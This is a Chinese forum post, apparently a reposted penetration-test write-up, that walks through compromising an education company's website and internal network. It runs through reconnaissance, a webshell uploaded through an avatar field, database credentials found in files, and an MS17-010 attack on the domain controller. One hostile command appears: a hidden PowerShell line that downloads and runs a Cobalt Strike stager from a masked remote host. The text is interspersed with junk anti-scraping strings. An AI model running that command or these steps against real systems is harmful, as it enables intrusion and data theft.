找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2115|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

: P- Z+ `6 @7 r2 Y 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路8 Q/ H8 N+ C' T$ p" |7 {# Y

7 P5 u' O: L1 L

: Q1 C0 ^, h, a+ x3 {! Z7 a8 R   9 T8 O. M2 y0 m# @) L8 G

' P9 h; Y* o3 @2 `

- v5 T2 R) W! m( `$ k 正文0 T8 h" }6 e8 D* t

, r2 f, p& N! {1 d" v1 T# v

1 j3 q5 C; k+ C) X8 R0 ^- P  1 z% [+ ^. V; P8 N$ W3 I# h- c

8 n+ g! f! R8 P; @

( e% W- u) w% M 目标:www.xxxx.com(一家教育机构)
/ v# \# e. {# b: x7 r
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
; s) B6 e _$ A- r- _6 U. z( U

3 s2 Z; }+ d* j# G' X# [; ^, s; h

" o, F% A% F; H2 N vshapes= ! R" @. I) U, C0 O) P

1 B' D) v: _: d( g3 E: f

$ m* y1 H# r4 b8 ]5 L1 P2 D; M 进行了简单的信息搜集
2 s* U2 W, T! q- M) a
& R6 j+ Y. r9 {4 I* p: h
. c7 D1 k& \/ g6 x# ^

6 R+ c+ P# I: D o$ _2 A6 u$ r

' Y# Z- ?! n) t' [3 P) i 子域名搜集6 G M. j* {3 \" g' w& a4 p

3 W+ I8 f6 _# g- b( |

9 e/ X! c" K0 [+ d3 C/ \# {8 \1 g vshapes= + G0 u5 ?, O2 O) }; x( P% m$ M6 b* X

; A, S- X P# y2 k8 M6 h' ^

7 n0 I. Y1 t: u5 Z5 h8 s fofa找资产
5 o! a {5 P9 q6 Z2 y S+ e) x
9 U5 ^) U+ L0 n9 j8 Z% Z
3 b& x& g% ^% f

% G0 P5 b4 `& H/ m( |( l

. \* b) l9 T- l: i; j5 t) i vshapes=/ w8 s+ E! V- r5 d. b

' j0 D' t. y6 k2 `8 i9 `

' U+ y$ `0 w- ]" S& l6 k; G 一共七个资产。去重之后只有两个。
8 M% s" ^6 g0 O5 q5 M- T' C. h
6 k$ U5 H6 m3 W9 W \( ^0 h6 X) m' u
0 e1 l! W( @6 l% h. {

% K& C+ H) L% R7 \

# R6 Z3 M2 x! [" r/ N 目录探测 $ C, |9 V* C1 n/ z. h" b

8 k# X9 N' ~7 y o

l! T. Q- `4 B0 z- P* y vshapes= - w5 f/ x8 w3 h6 p, Y9 w R* V1 n

; e* f9 q& M5 v) u

( [* f! @+ D" g/ z7 ~" {* E! f- z' y 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
+ ^1 O7 v9 h* w
' R' y0 n( t+ E3 Y7 |6 U: C9 g7 K- l
4 n3 E7 \0 |# t! t

& O. D& [) F, y

p. |0 i9 x& ?* D 我又尝试了通过修改返回包来绕过登录界面 1 D" S* Z9 e) n c

( @" W G* M. m6 ^7 J2 \2 ~" j6 p

& ], b7 ?" H+ @. z: ~ vshapes= 7 H( K; Y5 L/ _- E: j0 `3 r0 Y

0 n( `! W9 i; g" A$ t

% h( R/ U/ H) C 还是不行,尝试注入无果# u) B u) ]/ N4 g; R

2 `) p/ R6 t1 y, f$ r

, ]2 r+ a) E1 {" `4 J8 j vshapes=9 [* | X. T8 X) t6 b

( W' ?; W4 @1 z6 ]6 W: z

4 L3 m5 o5 l2 i# X 不过我目录探测出了一处Spring信息泄露
% D3 ?4 \/ Q1 E- c* s: [9 b
' E. h# C% X0 ]& Y& Y
* J4 ? i; c" h I% f6 A/ O

% C4 j' w) |% E8 a

+ f: j" w6 L% s% L) Y! I" S; ~$ L vshapes=2 g9 y) t9 ^2 B- ~# ]/ f* n

9 I8 A7 \/ x- |0 N- c# G. E# d5 `

- `5 \/ f m9 R. o- k; h& ~ 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 ; k/ _) m! ?& i4 C x& q

7 R* [) d, C% Z. r, L' j

9 G& A! ~& n* k4 s! q vshapes= / a8 y* |: e1 g( v% a, i

" H K, I0 }8 q7 X" ?6 Y

% E0 N( ] V/ f8 I 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。, X& }3 c5 b7 e% I

& `' b2 Y7 q5 _' {6 k1 [

5 z6 ]2 g8 w9 q0 B vshapes=, P$ { I) \! c( d9 S6 N* p

; E; J4 F- @- {1 W- g

! r8 K3 T- E/ m: A- \ 获取有些师傅到这一步就手机抓包电脑测了。, ^4 v8 j- R. h3 T

, r2 |+ Y* Z/ f+ |1 j( y4 }5 s

& }* }% f% B/ @4 H1 D Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 9 l0 x. q0 f6 g+ _. O

+ v6 [- p% C" e _% F

# ?. ^- j3 n2 S" Y" B. v1 o 其中在一个公众号发现了小程序,可以进行注册。 / Q0 K% a" c$ K9 {: z

) |7 Z# `5 q; j8 Z4 p' ^6 G% I

5 G/ B3 b5 ]! z; Z1 Q 看到了头像上传,尝试上传获取WebShell 8 M) b& A# }9 a8 C6 G$ q

6 T$ h) Y0 h4 K* A8 t

& z& @$ t# b& `6 e) I: X vshapes=/ \; m- y: s" f7 Y- W

* ?/ p3 L& M, a, N8 q

* _- Z& o! e! Y7 F$ d 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 * m! ^: d; O% g' X: w: a7 ~$ {

7 M7 } B" o; @' ]

w3 _2 a( t. g$ ?# v8 b vshapes= 2 S6 c( O. {* Z7 y5 m

0 E$ g5 S) m3 |* [' z' k' v2 T% T

* z1 N+ V# u6 r 然后上了大马 ( `/ C& x4 y7 n0 g. |

7 ~$ a2 m; G% S2 G9 @" E7 W$ K

+ a3 @/ O1 C, [6 Z1 ~ vshapes=$ x3 N% p" U5 S5 J! Y6 s( J5 }

& \+ F# B, d6 c5 k

4 P) g! M; I& V: c vshapes=) h3 o# |& Q9 B0 k/ g3 k/ {

- C: n9 `% E2 ]' e

7 B/ n8 N, {5 _' B; R2 m, J& H- f 通过翻找文件发现数据库账号密码; H, S, a6 X/ R0 @: j% ^, @

1 Z/ s D4 r# A! u9 G

# `& e2 ]8 t3 b( d- M0 K0 V6 v! s vshapes=. g0 R8 w1 t" l. ]9 `* g% a

4 U0 b" b I2 O5 u! d" X( k5 L

( Q, T/ V$ d% F9 k( p4 ~2 m- g4 o --内网渗透" C- `: `9 B! }; h7 |# b/ @

" S. V; k3 L. U9 x

$ f" @: u! b! ]9 z8 D; j! y 直接通过powershell执行 cs上线. d, a9 J# \4 ~, w

9 W2 U4 P8 |4 F/ [& K$ n3 P

7 i( P$ a0 }9 e6 U" i2 n powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"% H7 u5 R/ @- S; v3 [) @$ P

% ]( S6 }$ H8 ~5 I: s" {8 v

' x: |$ U/ M' x3 m5 l$ T! f4 P vshapes= , h, V5 f: ?" w! t- b g

! m* s7 O& b+ {* L' ^! M

8 Z% @( t5 d. k# H6 U! N 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 8 n- A2 D" X( _

$ Z. H: k9 a& ~# z$ I7 I8 y

+ T+ |1 w: j* P; n g vshapes= 5 u( v9 v! `( l- h9 P! m6 n& M/ i P% c1 d

" d5 x7 L* _! _5 A

( t2 P# g* O1 n5 j' X a, t R/ D 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
0 d, `$ G- y& N* i; s# z
( K% Q- ?) |' E0 x k* ?
$ u) K' t" D; _+ g+ T% Q
+ L9 N) ?0 x* g; t) z6 H1 a

% ?/ E% E" H& \! c1 ^ E5 p2 i

1 K+ V, q, L3 L; I vshapes=# c$ N3 q2 k5 U2 \$ n5 ^

# A/ T( y( }9 J2 e

/ }- J! J5 U5 b, B5 z1 Z8 u 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
6 h( n7 t( s, h3 s( C/ O
/ r" |" r* E7 w9 p5 R" ^, { ~
* l! r) _! ]. [: H, x/ P

& _9 ]. k% Y: |: j. p

& i4 ?3 o4 c) C vshapes= 8 ]+ ?" O6 c+ K0 F

9 M+ n! ?1 _2 X/ B7 ^; \; b

( t4 F$ N" d3 e4 x! M
! ]5 m/ D6 ^* ?& b9 w/ @* }
. N/ l' z/ p/ `! d% o, } z: o! }
. R- z2 O) G" m% {- F _3 S! \

" O# Q& L* s( X0 n" I

6 X5 w# f7 p$ _' Q$ h2 h   3 q/ g3 L5 v& I

8 l: i K U! n5 a' [* ]4 R

; Y6 a% q+ v* T/ T7 s# T 小结 5 L) j) t& u" v4 L0 R

% J( @7 s2 a+ @

, W# p! { P' v9 Z3 Q% }. s  " L# W) D: l6 ?( o

) G) Y; ^ X9 P& J. l4 y! S) _8 D

! A% h+ o/ o2 b! l8 ` 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! - R6 r/ ^: Y- ?) `, J" i8 X

# D0 J$ i( I2 h9 J( H

) o: `3 Y# h: j/ P   ; ^3 Y1 e/ u7 z/ w8 P- N9 A/ b5 i

5 b; [4 e. r. W' G
    9 G' @7 f2 U" [. m, D; E
  • ( [9 J1 ~( j" M" j  ; A3 @$ n. y4 C2 Q) D
  • ! K) v& F+ ^! t
  • % [* [2 Z8 f5 S \$ t  + F, t3 ~' Z8 s: ~1 Q" V
  • * a2 m7 ]0 e( k5 |, M# v7 S
. P% \: \7 w* D K5 M! n

; d+ g ~) A, P7 V5 C% n4 g 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html* F3 v7 ]- ^% v

?' t8 R! W" m: f" G

0 E1 d# q; Y$ W0 i   ) G' ?- X/ t- i7 J0 ?. Q: J" T

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表